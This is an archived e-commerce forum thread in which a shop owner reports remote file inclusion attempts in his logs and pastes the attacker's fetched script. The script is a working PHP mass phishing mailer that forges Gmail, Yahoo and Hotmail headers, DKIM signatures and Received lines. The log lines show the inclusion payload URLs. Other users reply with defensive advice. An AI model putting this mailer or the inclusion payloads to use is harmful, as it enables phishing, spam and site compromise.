Email attack ?

pvandebe · February 15, 2012

Hi guys,

I have implemented all security contributions I know and had no problems since 1 year and a half

But today I saw something weird coming in :

00:12:49 0 Guest 189.106.86.177 11:54:17 11:54:17 /ecom/catalog/product_info.php?products_id=http://www.kgom.net/korea/data/cs.txt?

00:12:13 0 Guest 189.106.86.177 11:54:53 11:54:53 /ecom/catalog/index.php?manufacturers_id=http://www.kgom.net/korea/data/cs.txt?

00:12:10 0 Guest 189.106.86.177 11:54:56 11:54:56 /ecom/catalog/index.php?manufacturers_id=78&sort=http://www.kgom.net/korea/data/cs.txt?

And here's the content of the script :

<html>

<head>

<!--

.cxtexto {

font-family: Verdana, Arial, Helvetica, sans-serif;

font-size: 9px;

border: thin #000000;

background-color: #FFFFFF;

color: #000000;

}

-->

</style>

</head>

</div>

<tr>

</tr>

<tr>

<input name="NRemetente" type="text" class="cxtexto" id="NRemetente" value="<?php echo stripslashes($_POST['NRemetente']);?>" size="33" maxlength="60"></td>

email</font></strong></div></td>

<input name="ERemetente" type="text" class="cxtexto" id="ERemetente" value="<?php echo stripslashes($_POST['ERemetente']);?>" size="39" maxlength="60"></td>

</tr>

<tr>

</tr>

<tr>

assunto</font></strong></div>

</td>

<input name="Assunto" type="text" class="cxtexto" id="Assunto" value="<?php echo stripslashes($_POST['Assunto']);?>" size="33" maxlength="120"></td>

lista</font></strong></div></td>

</tr>

<tr>

</tr>

<tr>

<font face="Verdana, Arial, Helvetica, sans-serif" size="1">i</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>ntervalo

</strong></font>

<strong>segundos</strong></font></div></td>

</tr>

<tr>

<font face="Verdana, Arial, Helvetica, sans-serif" size="1">conteudo</font></strong></td>

</tr>

<tr>

</tr>

<tr>

</td>

</tr>

</form>

</table>

<?php //Source PHP

//Para melhor 'debuging'

//error_reporting(E_ALL);

@ignore_user_abort(TRUE);

error_reporting(0);

@@set_time_limit(0);

ini_set("memory_limit", "-1");

//Verifica se os dados foram preenchidos

$teste = $_POST['teste'];

If ($teste == null) {

exit(/*"<br><center><b>Preencha corretamente os campos</b></center>"*/);

}

//Recupera os dados do FORM

$FromName = "Aviso de Cancelamento!"; // $FromName = $_POST['NRemetente'];

$FromMail = "mailer1.senderdirect.com"; // $FromMail = $_POST['ERemetente'];

$Subject = "Leia com atencao. Voce assinou a uniao entre o Windows Live Messenger e o Facebook."; // $Subject = $_POST['Assunto'];

$MailServer = explode("@",$FromMail,2); $MailServer = $MailServer['1'];

$arq_name = $_FILES["emails"]["name"];

$arq_temp = $_FILES["emails"]["tmp_name"];

$Lista = file("list.txt"); // $Lista = (file($arq_temp));

$QtdMail = count($Lista);

$Conteudo = file("engenharia.html"); // $Conteudo = stripslashes($_POST['Conteudo']);

$IntervalX = 0; //$_POST['Interval'];

$ip = gethostbyname($MailServer);

//Arquivos de configuracao

@ini_set("sendmail_from", $FromMail);

@ini_set("time_limit",0);

//Define os headers do email

// $headers = "From: $FromName <$FromMail>\n";

// $headers .= "MIME-Version: 1.0\n";

// $headers .= "Content-type: text/html; charset=iso-8859-1\n";

// $headers .= "Content-Transfer-encoding: 8bit\n";

// $headers .= "Reply-To: $FromName <$FromMail>\n";

// $headers .= "Return-Path: $FromMail\n";

// $headers .= "Message-ID: <".md5(uniqid(time()))."@$MailServer>\n";

// $headers .= "X-Priority: 3\n";

// $headers .= "X-MSmail-Priority: High\n";

// $headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n";

// $headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n";

// $headers .= "X-Mailer: iGMail [www.ig.com.br]\n";

// $headers .= "X-Originating-Email: [$FromName]\n";

// $headers .= "X-Sender: $FromName\n";

// $headers .= "X-Originating-IP: [201.201.120.121]\n";

// $headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n";

//Inicia o envio

If ($QtdMail <= 1) {

exit;

} else {

echo str_repeat("-", 126)."<br>";

echo "<b>De:</b> $FromName <$FromMail><br>";

echo "<b>Assunto:</b> $Subject<br>";

echo "<b>Para Lista:</b> $arq_name ($arq_temp) <b>contendo</b> $QtdMail <b>e-mails</b><br>";

echo "<b>Com intervalo de:</b> $IntervalX <b>segundos</b><br>";

echo str_repeat("-", 126)."<br>";

}

$error = 0;

$donen = 0;

while (list($pos, $val) = each($Lista)) {

$val = trim($val);

if (strstr(strtolower(htmlentities($val)), 'yahoo') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '')

{

//echo "\r\n ENTRA GMAIL \r\n";

$ip1 = gethostbyname('mta1176.mail.bf1.yahoo.com');

$ip2 = gethostbyname('col0-omc4-s12.col0.hotmail.com');

$headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Return-Path: <" . $FromMail . ">\r\n";

$headers .= "X-YMailISG: " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_ou " . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . ".7qGL.." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) ."--\r\n";

$headers .= "X-Originating-IP: [" . $ip2 . "]\r\n";

$headers .= "Authentication-Results: mta135.mail.sp2.yahoo.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";

$headers .= "Received: from 127.0.0.1 (EHLO col0-omc4-s12.col0.hotmail.com) (". $ip2 .") by mta135.mail.sp2.yahoo.com with SMTP; " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Received: from COL123-W11 ([65.55.34.201]) by col0-omc4-s12.col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675); " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Message-ID: <COL123-" . md5(uniqid(time())) . md5(uniqid(time())) . "-" . md5(uniqid(time())) . md5(uniqid(time())) . "@phx.gbl>\r\n";

$headers .= "Return-Path: " . $FromMail . "\r\n";

$headers .= "Content-Type: multipart/alternative; boundary=_" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "-" . md5(uniqid(time())) . "_\r\n";

$headers .= "X-Originating-IP: [" . $ip . "]\r\n";

$headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";

$headers .= "To: " . htmlentities($val) . "\r\n";

$headers .= "Date: " . date("j M Y G:i:s") . " -0300\r\n";

$headers .= "Importance: Normal\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0054 (UTC) FILETIME=[" . md5(uniqid(time())) . ":" . md5(uniqid(time())) . "]\r\n";

$headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n";

}

elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '')

{

//echo "\r\n ENTRA YAHOO \r\n";

$ip1 = gethostbyname('mta1176.mail.bf1.yahoo.com');

$ip2 = gethostbyname('mail-fx0-f217.google.com');

$headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Return-Path: <" . $FromMail . ">\r\n";

$headers .= "X-YMailISG: " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_ou " . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . ".7qGL.." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) ."--\r\n";

$headers .= "X-Originating-IP: [" . $ip2 . "]\r\n";

$headers .= "Authentication-Results: mta1176.mail.bf1.yahoo.com from=googlemail.com; domainkeys=neutral (no sig); from=googlemail.com; dkim=pass (ok)\r\n";

$headers .= "Received: from 127.0.0.1 (EHLO mail-ew0-f50.google.com) (". $ip2 .") by mta1176.mail.bf1.yahoo.com with SMTP; " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Received: by ewy10 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".37 for <" . htmlentities($val) . ">; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; bh=" . md5(uniqid(time())) . md5(uniqid(time())) . "=; b=" . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . "/956/cswcR8 " . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "=\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "Received: by 10.213.15.17 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".59." . md5(uniqid(time())) . md5(uniqid(time())) . "; Fri, 05 Aug 2011 08:12:10 -0700 (PDT)\r\n";

$headers .= "Received: by 10.213.14.138 with HTTP; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "Date: " . date("j M Y G:i:s") . " -0300\r\n";

$headers .= "Message-ID: <" . md5(uniqid(time())) . md5(uniqid(time())) . "-" . md5(uniqid(time())) . md5(uniqid(time())) . "@mail.gmail.com>\r\n";

$headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";

$headers .= "To: " . htmlentities($val) . "\r\n";

$headers .= "Content-Type: multipart/alternative; boundary=" . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "\r\n";

$headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n";

}

elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'yahoo') == '')

{

//echo "\r\n ENTRA HOTMAIL \r\n";

$ip1 = gethostbyname('mta1176.mail.bf1.yahoo.com');

$ip2 = gethostbyname('mail-fx0-f217.google.com');

$headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Return-Path: <" . $FromMail . ">\r\n";

$headers .= "X-YMailISG: " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_ou " . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "_" . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . ".7qGL.." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) ."--\r\n";

$headers .= "X-Originating-IP: [" . $ip2 . "]\r\n";

$headers .= "Authentication-Results: mta1176.mail.bf1.yahoo.com from=googlemail.com; domainkeys=neutral (no sig); from=googlemail.com; dkim=pass (ok)\r\n";

$headers .= "Received: from 127.0.0.1 (EHLO mail-ew0-f50.google.com) (". $ip2 .") by mta1176.mail.bf1.yahoo.com with SMTP; " . date("j M Y G:i:s") . " -0700\r\n";

$headers .= "Received: by ewy10 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".37 for <" . htmlentities($val) . ">; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; bh=" . md5(uniqid(time())) . md5(uniqid(time())) . "=; b=" . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . "/956/cswcR8 " . md5(uniqid(time())) . md5(uniqid(time())) . "/" . md5(uniqid(time())) . md5(uniqid(time())) . " " . md5(uniqid(time())) . md5(uniqid(time())) . "=\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "Received: by 10.213.15.17 with SMTP id " . md5(uniqid(time())) . md5(uniqid(time())) . ".59." . md5(uniqid(time())) . md5(uniqid(time())) . "; Fri, 05 Aug 2011 08:12:10 -0700 (PDT)\r\n";

$headers .= "Received: by 10.213.14.138 with HTTP; " . date("j M Y G:i:s") . " -0700 (PDT)\r\n";

$headers .= "Date: " . date("j M Y G:i:s") . " -0300\r\n";

$headers .= "Message-ID: <" . md5(uniqid(time())) . md5(uniqid(time())) . "-" . md5(uniqid(time())) . md5(uniqid(time())) . "@mail.gmail.com>\r\n";

$headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";

$headers .= "To: " . htmlentities($val) . "\r\n";

$headers .= "Content-Type: multipart/alternative; boundary=" . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "\r\n";

$headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n";

}

if (mail($val, $Subject, $Conteudo, $headers)) {

$donen++;

echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">';

} else {

$error++;

echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">';

}

$headers = "";

echo htmlentities($val).' [ok=.$donen.' error='.$error.' total='.($pos+1).'/'.$QtdMail.]</font><br>';

sleep($IntervalX);

}

unlink($arq_temp);

?>

</body>

</html>

Does anyone know what this is all about ?

Thanks,

Peter

February 15, 2012

I would suggest that your site was never cleaned properly and someone has been using your site as a mass email portal

Chris

♥geoffreywalton · February 15, 2012

Be interesting to see the traffic stats for the site.

G

pvandebe · February 16, 2012

I don't have more traffic then normal.

In fact I executed the script, it returns an error on the product_info page since it's not a number. Maybe if someone runs it from another location, it could generate emails.

Searched the log : it started 14/02

Now what I wanna do is, when products_id=xxxxx and xxxxx is not a number, get the IP blacklisted like in the IP trap, any ideas ?

February 16, 2012

Now what I wanna do is, when products_id=xxxxx and xxxxx is not a number, get the IP blacklisted like in the IP trap, any ideas ?

Actually, I would use rewrite in the .htaccess to just bring the user to the index.php page. This way, any old links or broken links don't get black listed, they just go to your mainpage. It could just be a customer following an outdated url

Chris

pvandebe · February 17, 2012

Thx Chris, I'll do that

Email attack ?

Recommended Posts

pvandebe

Link to comment

Share on other sites

Guest

Link to comment

Share on other sites

♥geoffreywalton

Link to comment

Share on other sites

pvandebe

Link to comment

Share on other sites

Guest

Link to comment

Share on other sites

pvandebe

Link to comment

Share on other sites

Archived

Browse

Activity